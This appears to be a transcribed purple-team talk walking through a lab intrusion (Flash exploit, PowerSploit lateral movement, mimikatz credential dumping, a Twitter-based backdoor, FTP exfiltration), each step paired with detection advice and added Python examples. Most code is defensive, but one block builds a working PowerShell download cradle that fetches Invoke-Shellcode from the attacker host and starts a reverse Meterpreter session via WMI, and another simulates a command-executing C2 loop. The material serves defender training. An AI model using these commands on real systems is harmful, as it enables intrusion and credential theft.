
Purple View

The recent trend of using Attack and Defense Together.

Given the recent trend of using offensive and defensive capabilities together, we thought a talk on Purple Teaming would be interesting. We hope it benefits those on the attack side (red team), those on the defensive side (blue team), and those mixing the two.


  1. Purple View: the recent trend of using attack and defense together. Not OUR idea, backed by many. @raffertylaura | @haydnjohnson
  2. Quick: who are we? Haydn Johnson (@haydnjohnson): OSCP, offensive/attack interest, enjoys presenting. Laura (@raffertylaura): MSc Computer Science (Security/Privacy), interested in both sides of security, loooooves presenting.
  3. Contents: 1. Basic term definitions 2. Introduction to Red, Blue and Purple 3. Run-through of an attack ○ Gaining Access ○ Lateral Movement ○ Domain Admin ○ Maintaining Access ○ Data Exfiltration 4. For each attack step: ○ Attacker's view ○ Defender's view ○ Possible Purple Team exercises
  4. Definitions. Exploit: the thing used to gain unauthorized access to a system. Payload: what is done after access is gained (shell, command). Metasploit: an open source, modular exploit framework. Meterpreter: an advanced, extensible payload that uses in-memory DLL injection. Shell: gaining terminal/CMD access remotely.
  5. Red Team - Penetration | Offensive ● Scans ● Exploits ● Logic abuse ● Access to things they shouldn't
  6. Blue Team - Block, Prevent, Detect | Defensive ● Logs ● Emails ● Events ● Triggers ● Networking ● More logs
  7. Red Team - Goals ● Model recent threats and trends ● Longer term ● Highlight gaps in security controls, detection, etc. ● Escape and evade for persistence
  8. Blue Team - Goals ● Detect the attack ● Respond and recover ● Produce actionable intelligence ● Identify gaps and investment needs
  9. Purple Team - Offensive & Defensive working together to achieve the ultimate goal of making the organization more secure ● Exposes the blue team to different threats and the attacker mindset ● Tests incident detection and response ● Allows the red team to sharpen skills ● Policy and procedures tested ● Tuning of controls
  10. Purple Team - Offensive & Defensive. Different types of Purple Teaming: ● Red Team sitting with the network defense team ● Adversary simulation ● Traffic generation ● Wargaming. Requires a total picture involving all areas of the organization.
  11. Purple Team - The difference ● Using security posture and weaknesses to find what is most valuable ● Goal oriented ● Review the attack ● Test how teams use services and how they are managed
  12. Purple Team - The difference ● Time to Domain Admin ● Time to data/objective ● Time to respond ● Time to recover ● Identify where there needs to be more investment ● Measure impact. Done right, the blue team should come out with better monitoring and response plans.
  13. Purple Team - The difference ● Set up a fake scenario: assume breach ● How will the attacker gain access? ● Why have they attacked, what do they want? ● How did they move through the network? ● If they exfiltrated data, how? Do not turn off servers or block IP addresses; keep it realistic.
  14. Purple Team - Exercise. "In the beginning, it's easy to challenge and exercise a network defense team. You will find that many network defenders do not have a lot of experience (actively) dealing with a sophisticated adversary." - Raphael Mudge
  15. Purple Team - DEMO (step by step): our exercise
  16. Purple Team - Demo Architecture. Domain:
  17. Tools Used. Red Team: ● Kali Linux ● Metasploit ● Meterpreter ● PowerSploit ● Twittor. Blue Team: ● Wireshark ● Windows Event Logs
  18. Setting up Windows GP (Group Policy)
  19. Gaining Access: Hacking Team Flash Exploit
  20. Flash Exploits ● Flash plugins are vulnerable ○ You can embed JavaScript or a binary within a Flash file ○ ActionScript defines events that redirect to the landing page ● Most exploit kit landing pages redirect to pages containing Flash exploits ○ Angler ○ Nuclear ○ Fiesta ● Installed by default in browsers ● New vulnerabilities are identified on almost a weekly basis
  21. Gaining Access: Flash
  22. A: Flash Exploit from SecurityFocus. Hacking Team Flash Exploit:
  23. A: Start Flash Exploit from Kali
  24. A: Start Flash Exploit from Kali (cont.)
  25. A: Redirect Victim. The Client1 user navigates to a malicious site which redirects to the exploit.
  26. A: Client1 is exploited
  27. A: A session is now established with Client1. We can now run Meterpreter.
  28. B: Wireshark: Landing Page and Redirect
  29. B: Wireshark: Shell
  30. B: What can you take away? Security Onion: implement it, it is free, and it has Snort rules for Flash exploits (need to install). Confirm whether Flash is needed for business reasons. Keep Flash updated. Example rules: 2811962 - ETPRO TROJAN APT HTTPBrowser dropped by CVE-2015-5119 SSL Cert (trojan.rules); 2811963 - ETPRO TROJAN APT HTTPBrowser dropped by CVE-2015-5119 CnC Beacon (trojan.rules)
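Slides 25 and 28 describe the initial-access pattern the blue team sees in Wireshark: a redirect chain from a legitimate page through a landing page to Flash content. The following is an added example (not the speakers' code or Security Onion's rules) that reconstructs such chains from proxy-style HTTP records and flags the ones that end in Flash served from an untrusted host. The log records, hostnames and the trusted-host list are constructed for the example.

```python
from typing import Dict, List
from urllib.parse import urlparse

# Constructed proxy log (not the talk's capture): one HTTP transaction per
# record, in the order the client issued them. Hostnames are placeholders.
SAMPLE = [
    {"client": "10.0.0.12", "url": "http://news.example.com/story.html",
     "status": 200, "ctype": "text/html", "location": None},
    {"client": "10.0.0.12", "url": "http://ads.example.net/go?id=7",
     "status": 302, "ctype": "", "location": "http://landing.example.org/index.php"},
    {"client": "10.0.0.12", "url": "http://landing.example.org/index.php",
     "status": 302, "ctype": "", "location": "http://landing.example.org/flash/player.swf"},
    {"client": "10.0.0.12", "url": "http://landing.example.org/flash/player.swf",
     "status": 200, "ctype": "application/x-shockwave-flash", "location": None},
    # A direct, internal SWF load with no redirect: should not be flagged.
    {"client": "10.0.0.13", "url": "http://intranet.example.com/training.swf",
     "status": 200, "ctype": "application/x-shockwave-flash", "location": None},
]

FLASH_TYPES = {"application/x-shockwave-flash"}


def redirect_chains(records: List[Dict]) -> List[Dict]:
    """Follow 3xx hops per client. A request whose URL equals the Location of
    that client's previous redirect extends the open chain; anything else
    starts a new chain. A non-redirect response closes the chain."""
    chains = []
    pending: Dict[str, tuple] = {}  # client -> (expected next url, urls so far)
    for r in records:
        client = r["client"]
        expected, urls = pending.pop(client, (None, []))
        urls = urls + [r["url"]] if r["url"] == expected else [r["url"]]
        if 300 <= r["status"] < 400 and r.get("location"):
            pending[client] = (r["location"], urls)  # chain continues
        else:
            chains.append({"client": client, "urls": urls, "final": r})
    return chains


def flag_flash_chains(chains: List[Dict], trusted_hosts: set) -> List[Dict]:
    """Alert when a chain of two or more hops lands on Flash content served
    from a host outside the trusted set: the landing-page pattern of slide 28."""
    alerts = []
    for chain in chains:
        final = chain["final"]
        host = urlparse(final["url"]).hostname
        is_flash = (final["ctype"] in FLASH_TYPES
                    or final["url"].lower().endswith(".swf"))
        if is_flash and len(chain["urls"]) > 1 and host not in trusted_hosts:
            alerts.append({"client": chain["client"], "host": host,
                           "chain": chain["urls"]})
    return alerts


if __name__ == "__main__":
    for alert in flag_flash_chains(redirect_chains(SAMPLE), {"intranet.example.com"}):
        print(alert["client"], "->", " -> ".join(alert["chain"]))
```

The chain itself is the useful artefact for the purple exercise: the red team can see which hop (ad redirector, landing page, SWF host) gave them away, and the blue team can turn the hop that is stable across campaigns into a proxy block or an IDS signature.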
  31. Purple Team - Exercise ● Blue team understands how attackers can gain initial access ● Flash exploits are an ongoing issue ● Helps the blue team identify suspicious traffic and what is happening from the attacker's perspective ● Red team sees how attacks are visible to the blue team and thinks of ways to make them stealthier
  32. Privilege Escalation: Not Shown
  33. Privilege Escalation ● We are skipping privilege escalation from Domain User to Local Admin
  34. Lateral Movement: PowerSploit
  35. A: PowerSploit. Available on GitHub, open source.
  36. A: PowerSploit. More than one script! PowerShell modules.
  37. PowerView. Part of PowerSploit (Recon), also bundled with PowerShell Empire. Very advanced.
  38. A: Lateral Movement. "The same local Administrator account passwords on multiple computers." by Sean Metcalf
  39. Same Passwords for All Local Admins
  40. A: Lateral Movement
  41. A: Lateral Movement. PowerSploit remote PowerShell using Invoke-Shellcode.ps1
  42. A: Base64 Encoding Payload. Base64-encoding the payload removes quoting and whitespace issues when it is passed to the remote host (PowerShell's -EncodedCommand expects the script as base64 of UTF-16LE text). From The Hacker Playbook 1 (now 2).
  43. A: Hosting PowerSploit. Invoke-Shellcode.ps1 (PowerSploit code) hosted on the local Kali machine.
  44. A: Invoke-WmiMethod. Use PowerShell to connect remotely, create a new process and launch the IEX cradle. Calls Windows Management Instrumentation (WMI) methods; the Win32_Process WMI class allows creation of a process (its Create method).
  45. A: Execute Remote Command. Execute a command from Client1 to tell Client2 to download and execute the shellcode.
  46. A: Client1 gives the same password. Same local admin password across multiple clients.
  47. A: Receive Shell
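Slides 41 to 47 are one procedure: build the Invoke-Shellcode download cradle, base64-encode it, and hand it to Client2 through Invoke-WmiMethod and Win32_Process.Create. The following is an added example (not the speakers' code and not PowerSploit's own) that generates that encoded command line on the attacker side and, for the defender, recovers the plaintext script from the command line a process-creation event records. The Kali address, listener port and target name are assumptions; the Invoke-Shellcode parameters are PowerSploit's.

```python
import base64
import re
from typing import List, Optional

# Assumed lab addresses (not from the slides): Kali serves the .ps1 over
# HTTP on port 80 and catches the Meterpreter session on LPORT.
KALI = "10.0.0.5"
LPORT = 4444

# Download cradle: fetch Invoke-Shellcode.ps1 straight into memory with IEX,
# then inject a reverse Meterpreter stager into the PowerShell process.
CRADLE = (
    f"IEX (New-Object Net.WebClient).DownloadString('http://{KALI}/Invoke-Shellcode.ps1'); "
    f"Invoke-Shellcode -Payload windows/meterpreter/reverse_https "
    f"-Lhost {KALI} -Lport {LPORT} -Force"
)


def encode_command(script: str) -> str:
    """-EncodedCommand takes the script as UTF-16LE text, base64-encoded.
    This is what removes the quoting/whitespace problems of slide 42 when the
    string is passed through WMI to the remote host."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def remote_command_line(script: str) -> str:
    """Command line that Win32_Process.Create will start on Client2."""
    return ("powershell.exe -NoProfile -WindowStyle Hidden "
            f"-EncodedCommand {encode_command(script)}")


def invoke_wmimethod_line(target: str, script: str) -> str:
    """The one-liner typed on Client1; $cred holds the shared local admin
    credential from slide 46 (assumed to be built with Get-Credential)."""
    return (f"Invoke-WmiMethod -ComputerName {target} -Credential $cred "
            f"-Class Win32_Process -Name Create "
            f"-ArgumentList '{remote_command_line(script)}'")


# Defender side: undo the encoding when the command line shows up in a
# process-creation event (4688 with command-line auditing, or Sysmon).
_ENC = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_command_line(cmdline: str) -> Optional[str]:
    """Return the plaintext behind -EncodedCommand, or None when the line is
    not an encoded PowerShell invocation or the blob is not valid UTF-16LE."""
    m = _ENC.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# Substrings a SIEM rule can key on once the command is decoded.
INDICATORS = ("IEX", "DownloadString", "Invoke-Shellcode", "Net.WebClient", "-Lhost")


def cradle_indicators(script: str) -> List[str]:
    lowered = script.lower()
    return [i for i in INDICATORS if i.lower() in lowered]


if __name__ == "__main__":
    print(invoke_wmimethod_line("Client2", CRADLE))
    print(decode_command_line(remote_command_line(CRADLE)))
    print(cradle_indicators(CRADLE))
```

Decoding is the step the blue team needs: the raw 4688 command line is an opaque base64 blob, and the indicators only become matchable after it is turned back into UTF-16LE text.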
  48. B: Wireshark traffic: TCP handshake, bind requests (WMI over DCE/RPC)
  49. B: Client1 requests a remote instance on Client2
  50. B: Client2 eventually asks where Kali is
  51. B: Client2 downloads Invoke-Shellcode.ps1
  52. B: Client1 logs into Client2
  53. B: PowerShell process created
  54. B: PowerShell connects to Kali. Client2 reaches out to Kali on port 80.
  55. B: What can you take away? Event correlation based on event ID, source and destination for remote connections. Implement alerting based on security events taken together; a SIEM can/SHOULD do this. Use LOG-MD, a really great logging tool, especially for PowerShell.
  56. Purple Team - Benefits ● Identify ways to move around the network ● Identify and confirm the defensive controls in place ● Identify what worked and what did not ● Implement changes ● Justification for resources
  57. Privilege Escalation: Local Admin to Domain Admin
  58. A: Local Admin to Domain Admin ● Why escalate privileges from Local Admin to Domain Admin? ● Domain Admin means control over Active Directory! ● Access IT resources ● Create accounts ● Propagate malware
  59. A: Local Admin to Domain Admin
  60. A: Local Admin to Domain Admin. From Client1, map the admin$ share on Client2 and copy over sekurlsa.dll.
  61. A: Local Admin to Domain Admin. Use psexec to run mimikatz.exe on Client2.
  62. A: Local Admin to Domain Admin. Use sekurlsa::logonpasswords to dump the Domain Admin logon credentials from Client2!
  63. B: Wireshark:
  64. B: Event Logs: Client1 logs into Client2 as local admin
  65. B: Event Logs: Client1 runs mimikatz on Client2
  66. B: Event Logs: Sensitive privilege use from Client1 to Client2
  67. B: What can you take away? ● Prevention: ○ Access control for shared drives ○ Limit access to psexec and monitor its use ○ Active Directory best practices ● Detection: ○ IDS signatures ○ SIEM use case: event correlation between system logs and network proxy logs ○ For lateral movement: enable file-level auditing ○ Canary accounts
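Slide 55 and slide 67 both ask for the same thing: correlate Windows events by event ID, source and destination, and join them with proxy logs. The following is an added example (not the speakers' code, and not a SIEM's rule language) of that correlation run over constructed log lines covering both chains the demo showed: the WMI-spawned PowerShell of slides 52 to 54, and the admin$ copy, psexec service install and sensitive-privilege use of slides 64 to 66. Host names, IP addresses, the 120-second window, the key=value export format and the WmiPrvSE.exe parent process are assumptions; the event IDs and field names are Windows' own.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed sample (not real log data). Client1 is 10.0.0.11, Client2 is the
# victim, Kali is 10.0.0.5. Security/System events and one proxy record are
# flattened to key=value so a single parser handles both sources.
SAMPLE_LOG = r"""
2016-03-12T10:05:01 host=Client2 id=4624 LogonType=3 TargetUserName=Administrator IpAddress=10.0.0.11
2016-03-12T10:05:03 host=Client2 id=4688 NewProcessName=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentProcessName=C:\Windows\System32\wbem\WmiPrvSE.exe
2016-03-12T10:05:05 host=Client2 id=proxy dst=10.0.0.5 dport=80 uri=/Invoke-Shellcode.ps1
2016-03-12T10:40:10 host=Client2 id=4624 LogonType=3 TargetUserName=Administrator IpAddress=10.0.0.11
2016-03-12T10:40:12 host=Client2 id=5145 ShareName=\\*\ADMIN$ RelativeTargetName=mimikatz.exe IpAddress=10.0.0.11
2016-03-12T10:40:20 host=Client2 id=7045 ServiceName=PSEXESVC ImagePath=%SystemRoot%\PSEXESVC.exe
2016-03-12T10:40:25 host=Client2 id=4673 PrivilegeList=SeDebugPrivilege ProcessName=C:\Windows\mimikatz.exe
2016-03-12T11:30:00 host=Client2 id=4624 LogonType=2 TargetUserName=laura IpAddress=-
2016-03-12T11:30:04 host=Client2 id=4688 NewProcessName=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentProcessName=C:\Windows\explorer.exe
"""

WINDOW = timedelta(seconds=120)  # assumed: follow-on activity within 2 minutes


def parse_log(text: str) -> List[Dict[str, object]]:
    events = []
    for line in text.strip().splitlines():
        ts, *pairs = line.split()
        ev: Dict[str, object] = dict(p.split("=", 1) for p in pairs)
        ev["ts"] = datetime.fromisoformat(ts)
        events.append(ev)
    return events


def _ends(ev: Dict, key: str, suffix: str) -> bool:
    return str(ev.get(key, "")).lower().endswith(suffix)


def correlate(events: List[Dict]) -> List[Dict]:
    """Every chain starts with a network logon (4624, type 3) from a remote
    IP; what that source does on the host in the next WINDOW decides the rule."""
    alerts = []
    by_host = defaultdict(list)
    for ev in events:
        by_host[ev["host"]].append(ev)
    for host, evs in by_host.items():
        evs.sort(key=lambda e: e["ts"])
        for i, logon in enumerate(evs):
            if logon["id"] != "4624" or logon.get("LogonType") != "3":
                continue  # console/interactive logons do not start a chain
            follow = [e for e in evs[i + 1:] if e["ts"] - logon["ts"] <= WINDOW]
            base = {"host": host, "source": logon["IpAddress"],
                    "user": logon["TargetUserName"]}

            # Slides 52-54: PowerShell spawned by the WMI provider host, with the
            # proxy confirming the .ps1 fetch from Kali when that log is present.
            wmi_ps = [e for e in follow if e["id"] == "4688"
                      and _ends(e, "NewProcessName", "powershell.exe")
                      and _ends(e, "ParentProcessName", "wmiprvse.exe")]
            fetch = [e for e in follow if e["id"] == "proxy" and _ends(e, "uri", ".ps1")]
            if wmi_ps:
                alerts.append({**base, "rule": "wmi_powershell",
                               "evidence": ["4624", "4688"] + (["proxy"] if fetch else [])})

            # Slides 64-66: PSEXESVC installed, plus a write to ADMIN$ or
            # SeDebugPrivilege use (what mimikatz needs to read LSASS).
            svc = [e for e in follow if e["id"] == "7045"
                   and str(e.get("ServiceName", "")).upper() == "PSEXESVC"]
            share = [e for e in follow if e["id"] == "5145" and _ends(e, "ShareName", "admin$")]
            dbg = [e for e in follow if e["id"] == "4673"
                   and "sedebugprivilege" in str(e.get("PrivilegeList", "")).lower()]
            if svc and (share or dbg):
                alerts.append({**base, "rule": "psexec_credential_dump",
                               "evidence": ["4624", "7045"]
                               + (["5145"] if share else []) + (["4673"] if dbg else [])})
    return alerts


if __name__ == "__main__":
    for a in correlate(parse_log(SAMPLE_LOG)):
        print(a["rule"], a["source"], "->", a["host"], a["evidence"])
```

The interactive logon at 11:30 followed by PowerShell under explorer.exe is deliberately present and not flagged: the rules key on the remote source plus the parent process, not on PowerShell alone, which is what keeps the alert useful on a network where administrators use PowerShell all day.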
  68. Purple Team - Benefits ● Blue team observes vulnerabilities/threats which may not have been considered ○ Learns how an attacker could escalate privileges from local admin to domain admin ● Red team observes the footprint left behind by this attack and possibly how to minimize it ○ Can identify potential weaknesses in blue team monitoring/response processes ○ Provides more thorough recommendations
  69. Twittor: Backdoor using Twitter
  70. A: Twittor ● Easy to install ● Easy to use ● Easy to add shellcode
  71. A: Twittor - insides. Simple subprocess execution; commands stored as base64-encoded messages.
  72. A: PyInstaller. On GitHub; turns a Python file into an EXE.
  73. A: PyInstaller. Python file becomes an executable.
  74. Twittor: Backdoor Using Twitter
  75. A: Twittor. Python file used as the C2 server; Python file used as the backdoor EXE (via PyInstaller).
  76. A: Twittor - Retrieving command. Send the command to execute; retrieve the command.
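Slides 71, 75 and 76 describe the Twittor loop: the operator posts a base64-encoded command, the implant fetches it, runs it through a subprocess and posts the base64-encoded output back. The following is an added offline simulation of that channel (not Twittor's own code): an in-memory FakeTwitterAPI stands in for the direct-message API, and the JSON envelope inside the base64 is this example's own layout. It also adds the check slide 77 asks for ("normal user traffic??"): a real user does not hit the API at a near-constant interval, so the defender function flags beacon-like timing on the proxy's timestamps.

```python
import base64
import json
import subprocess
from typing import Dict, List


class FakeTwitterAPI:
    """Stand-in for the Twitter direct-message API (assumption: one message
    queue per account). A real implant swaps send/fetch for API calls."""

    def __init__(self) -> None:
        self._queues: Dict[str, List[str]] = {}

    def send(self, to: str, text: str) -> None:
        self._queues.setdefault(to, []).append(text)

    def fetch(self, who: str) -> List[str]:
        msgs = self._queues.get(who, [])
        self._queues[who] = []
        return msgs


def encode_message(kind: str, body: str) -> str:
    """Commands and results travel base64-encoded so arbitrary bytes and
    whitespace survive the message service's text handling."""
    return base64.b64encode(json.dumps({"type": kind, "body": body}).encode()).decode()


def decode_message(text: str) -> dict:
    return json.loads(base64.b64decode(text))


def operator_send(api: FakeTwitterAPI, implant: str, command: str) -> None:
    api.send(implant, encode_message("cmd", command))


def implant_poll(api: FakeTwitterAPI, implant: str, operator: str) -> List[str]:
    """One polling cycle of the backdoor: decode each queued command, run it
    in a subprocess (shell=True, as a shell-style C2 does), post the output
    back to the operator's account, and return the outputs for inspection."""
    outputs = []
    for raw in api.fetch(implant):
        msg = decode_message(raw)
        if msg.get("type") != "cmd":
            continue
        proc = subprocess.run(msg["body"], shell=True, capture_output=True, text=True)
        out = proc.stdout + proc.stderr
        api.send(operator, encode_message("result", out))
        outputs.append(out)
    return outputs


def operator_receive(api: FakeTwitterAPI, operator: str) -> List[str]:
    msgs = (decode_message(m) for m in api.fetch(operator))
    return [m["body"] for m in msgs if m.get("type") == "result"]


def looks_like_beacon(times: List[float], tolerance: float = 0.2, minimum: int = 4) -> bool:
    """Defender check: timestamps (seconds) of one client's requests to the
    API. True when there are at least `minimum` gaps and every gap lies within
    `tolerance` of the mean gap, i.e. a timer rather than a person."""
    if len(times) < minimum + 1:
        return False
    gaps = [b - a for a, b in zip(times, times[1:])]
    mean = sum(gaps) / len(gaps)
    return mean > 0 and all(abs(g - mean) <= tolerance * mean for g in gaps)


if __name__ == "__main__":
    api = FakeTwitterAPI()
    operator_send(api, "client1", "echo purple")
    implant_poll(api, "client1", "operator")
    print(operator_receive(api, "operator"))
    print(looks_like_beacon([0, 60, 121, 180, 239]))
```

Beacon timing is the weak spot of a social-media C2: the API endpoint is legitimate and the content is opaque, but the polling interval is the one thing the implant cannot hide without adding jitter, which is exactly the kind of observation a purple exercise should feed back to the red team.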
  77. B: Twittor - Network Traffic. Reaching out to the API. Normal user traffic??
  78. B: Twittor - Client system. Backdoor as a Python executable compiled with PyInstaller's --noconsole flag to hide output.
  79. B: Traffic from Client. Reaches out to Twitter; source and destination are internal IPs, sends to the API.
  80. B: What can you take away? Check whether there are any remote connections after hours; is it against policy? Again, correlate logs with known C2 addresses. See if AV picks it up.
  81. Purple Team - Benefits. Test whether a C2 can reach out to Twitter. Social media may be blocked in the browser, but some sites can still be accessed via the API etc. If it is not blocked, why not? Can your blue team help to stop this and others?
  82. Data Exfiltration: Clear-Text FTP
  83. A: Data Exfiltration Through Clear-Text FTP
  84. A: FTP Extraction: finding data to extract
  85. A: Finding data: important data identified
  86. A: Downloading data
  87. A: Data transferred
  88. B: Meterpreter connection. DLL injection; lots of chatter.
  89. B: FTP connection: clear text
  90. B: Successful transfer
  91. B: What can you take away? Disable FTP; there should not really be a business need for it. If there is a business need, whitelist those IP addresses and create a group of users specifically for FTP.
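Slides 89 to 91 show why clear-text FTP matters: Wireshark reconstructs the login and the transfer, and the takeaway is to allow FTP only to approved servers. The following is an added example (not the speakers' code) that does the same reassembly over constructed control-channel records and applies the allowlist rule from slide 91, reporting the exposed credential and the direction of each transfer. The addresses, ports, user names and file names are made up for the example.

```python
from typing import Dict, List, Tuple

# Constructed capture (not the talk's pcap): control-channel payloads as
# (timestamp, src, dst, dst_port, payload). 10.0.0.12 is the compromised
# client, 10.0.0.5 the attacker's FTP server, 10.0.0.50 an approved internal
# FTP server; all of these are assumptions.
SAMPLE = [
    (1.0, "10.0.0.12", "10.0.0.5", 21, "USER ftp\r\n"),
    (1.1, "10.0.0.5", "10.0.0.12", 49152, "331 Please specify the password.\r\n"),
    (1.2, "10.0.0.12", "10.0.0.5", 21, "PASS purple2016\r\n"),
    (1.3, "10.0.0.5", "10.0.0.12", 49152, "230 Login successful.\r\n"),
    (2.0, "10.0.0.12", "10.0.0.5", 21, "STOR payroll.xlsx\r\n"),
    (2.5, "10.0.0.5", "10.0.0.12", 49152, "226 Transfer complete.\r\n"),
    (5.0, "10.0.0.20", "10.0.0.50", 21, "USER backup\r\n"),
    (5.2, "10.0.0.20", "10.0.0.50", 21, "PASS nightly\r\n"),
    (5.3, "10.0.0.50", "10.0.0.20", 50000, "230 Login successful.\r\n"),
    (6.0, "10.0.0.20", "10.0.0.50", 21, "RETR report.pdf\r\n"),
    (6.4, "10.0.0.50", "10.0.0.20", 50000, "226 Transfer complete.\r\n"),
]

Session = Dict[str, object]


def ftp_sessions(records: List[Tuple]) -> Dict[Tuple[str, str], Session]:
    """Reassemble FTP control sessions keyed by (client, server). Every field
    is read straight off the wire: FTP sends credentials and commands
    unencrypted, which is what the Wireshark view on slide 89 shows."""
    sessions: Dict[Tuple[str, str], Session] = {}
    for ts, src, dst, dport, payload in records:
        line = payload.strip()
        if dport == 21:  # client -> server command
            s = sessions.setdefault((src, dst), {
                "user": None, "password": None, "files": [],
                "logged_in": False, "start": ts})
            verb, _, arg = line.partition(" ")
            verb = verb.upper()
            if verb == "USER":
                s["user"] = arg
            elif verb == "PASS":
                s["password"] = arg
            elif verb in ("STOR", "RETR"):
                s["files"].append((verb, arg))
        else:  # server -> client reply; look the session up in reverse
            s = sessions.get((dst, src))
            if s and line.startswith("230"):
                s["logged_in"] = True
    return sessions


def check_ftp(sessions: Dict[Tuple[str, str], Session], allowlist: set) -> List[Dict]:
    """Flag every FTP session to a server outside the allowlist. STOR means
    data left the client (exfiltration), RETR means data was pulled onto it."""
    alerts = []
    for (client, server), s in sessions.items():
        if server in allowlist:
            continue
        alerts.append({
            "client": client, "server": server,
            "credential": f"{s['user']}:{s['password']}",
            "logged_in": s["logged_in"],
            "uploaded": [f for v, f in s["files"] if v == "STOR"],
            "downloaded": [f for v, f in s["files"] if v == "RETR"],
        })
    return alerts


if __name__ == "__main__":
    for alert in check_ftp(ftp_sessions(SAMPLE), allowlist={"10.0.0.50"}):
        print(alert)
```

The same parser answers the exercise question on slide 92 ("will any alarms trigger?"): if nothing in the environment produces this alert, the clear-text transfer went unobserved, and the time between the STOR and the first ticket is the time-to-detect the team should record.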
  92. Purple Team - Exercise. Clear text: will any alarms trigger? Understand potential holes in alerting. Measure time to detect and respond.
  93. Conclusion: Purple Teaming is Good
  94. Purple Team - Reiteration. Provides more value than a penetration test. Should be implemented on a regular schedule. Helps train security personnel. Helps make sure your boxes are tuned.
  95. Limitations and Future Work ● So far we have limited detection tools to Windows Server event logs and Wireshark (and a bit of Snort) ● Could be extended to enterprise security tools such as SIEM/IDS ● PowerShell/WMI for the blue team ● More advanced attacks, persistence using PowerShell Empire
  96. Obligatory Cute Kat Picture
  97. References are in the following slides
  98. Microsoft - 8 minute video
  99. Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013
  100. A: Downloads PowerShell file. Client2 reaches out to the Kali machine.